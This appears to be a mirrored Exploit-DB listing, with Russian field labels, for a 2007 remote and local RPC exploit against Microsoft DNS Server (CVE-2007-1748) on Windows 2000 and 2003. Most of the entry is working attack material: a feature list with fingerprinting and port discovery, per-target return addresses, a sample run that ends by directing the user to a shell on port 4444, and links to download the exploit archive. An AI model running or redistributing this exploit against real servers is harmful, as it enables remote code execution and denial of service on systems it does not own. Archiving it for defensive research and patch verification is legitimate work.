- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 3746
- Проверка EDB
-
- Пройдено
- Автор
- ANDRES TARASCO
- Тип уязвимости
- REMOTE
- Платформа
- WINDOWS
- CVE
- cve-2007-1748
- Дата публикации
- 2007-04-18
Код:
Exploit v2 features:
- Target Remote port 445 (by default but requires auth)
- Manual target for dynamic tcp port (without auth)
- Automatic search for dynamic dns rpc port
- Local and remote OS fingerprinting (auto target)
- Windows 2000 server and Windows 2003 server (Spanish) supported by default
- Fixed bug with Windows 2003 Shellcode
- Universal local exploit for Win2k (automatic search for opcodes)
- Universal local and remote exploit for Win2k3 (/GS bypassed only with DEP disabled)
- Added targets for remote win2k English and italian (not tested, found with metasploit opcode database. please report your owns)
- Microsoft RPC api used ( who cares? :p )
D:\Programación\DNSTEST>dnstest
--------------------------------------------------------------
Microsoft Dns Server local & remote RPC Exploit code
Exploit code by Andres Tarasco & Mario Ballano
Tested against Windows 2000 server SP4 and Windows 2003 SP2
--------------------------------------------------------------
Usage: dnstest -h 127.0.0.1 (Universal local exploit)
dnstest -h host [-t id] [-p port]
Targets:
0 (0x30270b0b) - Win2k3 server SP2 Universal - (default for win2k3)
1 (0x79467ef8) - Win2k server SP4 Spanish - (default for win2k )
2 (0x7c4fedbb) - Win2k server SP4 English
3 (0x7963edbb) - Win2k server SP4 Italian
4 (0x41414141) - Windows all Denial of Service
D:\Programación\DNSTEST>dnstest.exe -h 192.168.1.2
--------------------------------------------------------------
Microsoft Dns Server local & remote RPC Exploit code
Exploit code by Andres Tarasco & Mario Ballano
Tested against Windows 2000 server SP4 and Windows 2003 SP2
--------------------------------------------------------------
[+] Trying to fingerprint target.. (05.02)
[+] Remote Host identified as Windows 2003
[-] No port selected. Trying Ninja sk1llz
[+] Binding to ncacn_ip_tcp: 192.168.1.2
[+] Found 50abc2a4-574d-40b3-9d66-ee4fd5fba076 version 5.0
[+] RPC binding string: ncacn_ip_tcp:192.168.1.2[1105]
[+] Dynamic DNS rpc port found (1105)
[+] Connecting to 50abc2a4-574d-40b3-9d66-ee4fd5fba076@ncacn_ip_tcp:192.168.1.2[1105]
[+] RpcBindingFromStringBinding success
[+] Sending Exploit code to DnssrvOperation()
[+] Now try to connect to port 4444
also available at
http://514.es/Microsoft_Dns_Server_Exploit_v2.1.zip
http://www.48bits.com/exploits/dnsxpl.v2.1.zip
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3746.zip (04172007-dnsxpl.v2.1.zip)
# milw0rm.com [2007-04-18]
- Источник
- www.exploit-db.com